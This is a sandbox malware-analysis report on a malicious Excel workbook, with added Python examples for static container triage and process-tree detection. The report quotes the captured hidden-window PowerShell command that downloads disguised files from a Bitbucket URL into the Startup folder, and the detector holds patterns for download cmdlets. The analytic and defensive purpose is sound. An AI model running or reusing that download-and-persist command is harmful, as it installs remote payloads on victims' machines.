| Field | Value |
|---|---|
| File name | 2a28851adbc88c3335c6378c1f02df7f92b6912bbba8515186de194cb284993a |
| Full analysis | https://app.any.run/tasks/e0e501da-16f7-4d9d-8e6b-b64517999aff |
| Verdict | Malicious activity |
| Analysis date | March 21, 2019, 22:18:37 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | 6BA7890D1FD39FD3BDE3F5E29DF62AAC |
| SHA1 | 6A57118CF2E07AB50D76D3BEAA114E96EC9B7941 |
| SHA256 | 2A28851ADBC88C3335C6378C1F02DF7F92B6912BBBA8515186DE194CB284993A |
| SSDEEP | 384:ohtJe3e9nJasT/UlM9z55u0S19SNL3N+lbIEmEDq/iuv9OrDnWa4t:yJbJjxtMDDyLklbIEPeausvWDt |
| Extension | File type identification | Match (%) |
|---|---|---|
| .xlsx | Excel Microsoft Office Open XML Format document | 61.2 |
| .zip | Open Packaging Conventions container | 31.5 |
| .zip | ZIP compressed archive | 7.2 |
| Document property | Value |
|---|---|
| AppVersion | 16.03 |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| Company | - |
| TitlesOfParts | Sheet1 |
| HeadingPairs | |
| ScaleCrop | No |
| DocSecurity | None |
| Application | Microsoft Excel |
| ModifyDate | 2019:03:14 16:43:56Z |
| CreateDate | 2018:11:03 15:16:32Z |
| LastModifiedBy | r |
| ZIP entry property | Value |
|---|---|
| ZipFileName | [Content_Types].xml |
| ZipUncompressedSize | 1675 |
| ZipCompressedSize | 431 |
| ZipCRC | 0x6560a6f0 |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCompression | Deflated |
| ZipBitFlag | 0x0006 |
| ZipRequiredVersion | 20 |
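The ZIP entry metadata above covers only the first part of the container, [Content_Types].xml (the 1980-01-01 timestamp is what Office stamps on every part it writes). What a triager wants from the container is the full part list with hashes, plus any embedded objects, VBA project or external relationship targets. The example below is added here and is not any.run's code or anything extracted from the sample; the workbook it inspects is constructed in memory, and it assumes the sample carried UniversalCrypto.zip as an embedded object under xl/embeddings/, which the report does not state directly (it only shows EXCEL.EXE writing the zip to %TEMP% and opening it with WinRAR).

```python
"""Static triage of an OOXML/OPC container: hash every part and flag embedded
objects, OLE compound-file parts, a VBA project and external relationship targets.
Added example; the workbook it inspects is constructed below, not the report's sample."""
import hashlib
import io
import re
import zipfile

EMBEDDING_DIRS = ("xl/embeddings/", "word/embeddings/", "ppt/embeddings/")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # Compound File Binary header
# A <Relationship> element carrying TargetMode="External", in either attribute order.
EXTERNAL_REL_RE = re.compile(
    r'<Relationship\b(?=[^>]*TargetMode="External")[^>]*\bTarget="([^"]+)"', re.I)


def build_sample_xlsx():
    """Minimal constructed workbook: one embedded OLE object plus one external link.
    Assumption: the real sample carried its payload zip as an embedded package;
    the report only shows EXCEL.EXE writing the zip to %TEMP% and launching WinRAR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="bin" '
                   'ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>'
                   '</Types>')
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels",
                   '<Relationships>'
                   '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                   'officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/>'
                   '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/'
                   'officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" '
                   'TargetMode="External"/>'
                   '</Relationships>')
        # Dummy OLE compound file standing in for an embedded package object.
        z.writestr("xl/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def inspect_ooxml(data):
    """Walk every part of the container and return hashes plus the flags that fired."""
    result = {"parts": [], "embeddings": [], "ole_parts": [], "macros": [], "external_targets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            blob = z.read(info)
            name = info.filename
            result["parts"].append({"name": name, "size": info.file_size,
                                    "sha256": hashlib.sha256(blob).hexdigest()})
            if name.startswith(EMBEDDING_DIRS):
                result["embeddings"].append(name)
            if blob.startswith(OLE_MAGIC):
                result["ole_parts"].append(name)
            if name.endswith("vbaProject.bin"):
                result["macros"].append(name)
            if name.endswith(".rels"):
                result["external_targets"] += EXTERNAL_REL_RE.findall(blob.decode("utf-8", "replace"))
    result["suspicious"] = bool(result["embeddings"] or result["ole_parts"]
                                or result["macros"] or result["external_targets"])
    return result


if __name__ == "__main__":
    report = inspect_ooxml(build_sample_xlsx())
    for part in report["parts"]:
        print(f'{part["sha256"]}  {part["size"]:6d}  {part["name"]}')
    for key in ("embeddings", "ole_parts", "macros", "external_targets"):
        print(f"{key}: {report[key]}")
    print("suspicious:", report["suspicious"])
```

Run it against a real .xlsx by replacing `build_sample_xlsx()` with the file's bytes; the embedded part's SHA-256 is what you would pivot on (here the report gives 318806A1... for the dropped UniversalCrypto.zip, but the hash of the OLE wrapper around it will differ, so hash the payload after extracting it from the OLE stream as well).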
| PID | Parent | Image | Description (company) | Integrity | Exit code | Version |
|---|---|---|---|---|---|---|
| 2928 | explorer.exe | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Microsoft Excel (Microsoft Corporation) | MEDIUM | | 14.0.6024.1000 |
| 948 | EXCEL.EXE | C:\Program Files\WinRAR\WinRAR.exe | WinRAR archiver (Alexander Roshal) | MEDIUM | 0 | 5.60.0 |
| 2832 | WinRAR.exe | C:\Windows\system32\NOTEPAD.EXE | Notepad (Microsoft Corporation) | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3812 | WinRAR.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows PowerShell (Microsoft Corporation) | MEDIUM | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |

All four processes ran as user admin; the report's Indicators column is empty for each of them. Command lines as captured:

- PID 2928: `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde`
- PID 948: `"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip"`
- PID 2832: `"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa948.25201\LICENSE.txt`
- PID 3812, a single line in the capture, wrapped here at the statement separators:

      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden
      [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
      Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/servicesprint.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\servicesprint.lnk;
      -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
      Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/pcmon.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\pcmon.exe

Read together with the file table, the chain is: EXCEL.EXE wrote UniversalCrypto.zip to %TEMP% and handed it to WinRAR; WinRAR extracted LICENSE.txt (opened in Notepad) and UniversalCrypto-scanner.lnk; powershell.exe then started with WinRAR as its parent, which is consistent with the shortcut being launched from the archive window. The PowerShell command runs without a profile and with a hidden window, forces TLS 1.2, and fetches two URLs whose names end in .png but writes them into the user's Startup folder as servicesprint.lnk and pcmon.exe, so whatever was downloaded would run at the next logon. The token sequence `-nop -w hidden` appears twice in the captured command line, so the shortcut appears to have been built by concatenating two separate invocations. The file table in this report does not list servicesprint.lnk or pcmon.exe under the Startup folder, so the report gives no evidence that either download landed on disk in this run, and it does not show why.
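The process tree above is the kind of chain a detection rule should catch without needing the file hashes: an Office process spawning an archiver, a script host under that archiver, a hidden-window download, and output paths in the Startup folder with an extension that differs from the URL's. The example below is added here and is not any.run's code; the event records are transcribed from the report's process table, the explorer.exe record (pid 1000) is an assumed placeholder because the report does not give explorer's PID, and the image-name lists and regular expressions are this example's own heuristics.

```python
"""Behavioural triage of a sandbox process tree: flag Office -> archiver -> PowerShell
chains that download into the user's Startup folder.  Added example; the event
records are transcribed from the report's process table, and the explorer.exe
record (pid 1000) is an assumed placeholder."""
import ntpath
import re
from urllib.parse import urlsplit

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

URL_RE = re.compile(r'https?://[^\s";<>]+', re.I)
# -OutFile value: non-space run where a backtick escapes the next character
# (PowerShell's escape, used in the capture for the space in "Start` Menu").
OUTFILE_RE = re.compile(r'-OutFile\s+((?:`.|[^\s;"])+)', re.I)
HIDDEN_RE = re.compile(r'-w(?:indowstyle)?\s+hidden', re.I)
DOWNLOAD_RE = re.compile(r'Invoke-WebRequest|\biwr\b|\.DownloadFile\(|\.DownloadString\(|Start-BitsTransfer', re.I)
STARTUP_RE = re.compile(r'\\Start Menu\\Programs\\Startup\\', re.I)

# Command line of PID 3812 exactly as the report captured it.
POWERSHELL_CMD = (
    r'"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden '
    r'[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; '
    r'Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/servicesprint.png" '
    r'-OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\servicesprint.lnk; '
    r'-nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; '
    r'Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/pcmon.png" '
    r'-OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\pcmon.exe'
)

# Constructed from the report's process table; pid 1000 for explorer.exe is assumed.
EVENTS = [
    {"pid": 1000, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2928, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'},
    {"pid": 948, "ppid": 2928, "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip"'},
    {"pid": 2832, "ppid": 948, "image": r"C:\Windows\system32\NOTEPAD.EXE",
     "cmdline": r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa948.25201\LICENSE.txt'},
    {"pid": 3812, "ppid": 948, "image": r"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": POWERSHELL_CMD},
]


def image_name(ev):
    return ntpath.basename(ev["image"]).lower()


def lineage(ev, by_pid):
    """Image names from the root of the tree down to ev, e.g. explorer -> excel -> winrar."""
    chain, seen, cur = [], set(), ev
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(image_name(cur))
        cur = by_pid.get(cur["ppid"])
    return list(reversed(chain))


def parse_downloads(cmdline):
    """Pair each URL with the first -OutFile that follows it; backtick escapes are removed."""
    urls = [(m.start(), m.group(0)) for m in URL_RE.finditer(cmdline)]
    outs = [(m.start(), m.group(1).replace("`", "")) for m in OUTFILE_RE.finditer(cmdline)]
    pairs = []
    for upos, url in urls:
        following = [path for opos, path in outs if opos > upos]
        pairs.append((url, following[0] if following else None))
    return pairs


def finding(ev, rule, detail):
    return {"pid": ev["pid"], "rule": rule, "detail": detail}


def triage(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        name, chain, parent = image_name(ev), lineage(ev, by_pid), by_pid.get(ev["ppid"])
        if parent is not None and image_name(parent) in OFFICE and name not in OFFICE:
            findings.append(finding(ev, "office-child-process", f"{image_name(parent)} spawned {name}"))
        if name not in SCRIPT_HOSTS:
            continue
        if OFFICE & set(chain[:-1]):
            findings.append(finding(ev, "office-lineage-script-host", " -> ".join(chain)))
        cmd = ev["cmdline"]
        if HIDDEN_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
            findings.append(finding(ev, "hidden-window-download", "hidden window plus download cmdlet"))
        for url, out in parse_downloads(cmd):
            if out is None:
                continue
            if STARTUP_RE.search(out):
                findings.append(finding(ev, "startup-folder-write", out))
            url_ext = ntpath.splitext(urlsplit(url).path)[1].lower()
            out_ext = ntpath.splitext(out)[1].lower()
            if url_ext and out_ext and url_ext != out_ext:
                findings.append(finding(ev, "extension-mismatch", f"{url} saved as {out_ext}"))
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f'pid {f["pid"]:>5}  {f["rule"]:<28} {f["detail"]}')
```

Notepad under WinRAR produces no finding, which is the intended behaviour: an archiver opening a text file is normal, and the rule set keys on script hosts, Office parentage, and the download-to-Startup pattern rather than on every child process.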
| PID | Process | File written | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR62C.tmp.cvr | | | |
| 3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XA1SXONZTDONDX4ZF0C4.temp | | | |
| 948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa948.26130\UniversalCrypto-scanner.lnk | lnk | 6CD8352A312D3F58AE3DB17293825DC9 | 150B92C113DB1956CB1BA07F9D74B68017FDB4D3FFAE3869A6C8198699FECB7E |
| 948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa948.25201\LICENSE.txt | text | 6002BEBC94A9E50598F7E7A185837B66 | 9139DBC15F10633C6AEF1D959B6F00CC26809C7C5F76E9103175772D857C15B4 |
| 3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5f3d8aaae8f69194.customDestinations-ms | binary | 9A295A4F47D5D90072B5A4F698AF44B6 | AFFFAFE39439975B791B1F179B8940BC14DF8F94F5BA41B9CAADF025E8FB8B0C |
| 2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip | compressed | 03BCD9FC092ABA4675986BFF5F333310 | 318806A1E6B9E7A1243598EED36FA610E5ED437244ED6C259C0AFDE3DD23BD4F |
| 2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2ABD209E.emf | emf | 71177D9512C0AD9D0B9B94388028ACC8 | B177E0281B98CD231B8E1525B8A7D99B42D24D839B7975877BF635EF94961E93 |

The two files of interest are UniversalCrypto.zip, written by EXCEL.EXE before WinRAR was launched, and UniversalCrypto-scanner.lnk, extracted by WinRAR into its Rar$DIa948.* temporary directory; their hashes are the ones worth pivoting on. The CustomDestinations entries under Recent are jump-list artifacts that powershell.exe writes when it starts, so they record the launch rather than being attacker payload. No files under the Startup folder appear in this list.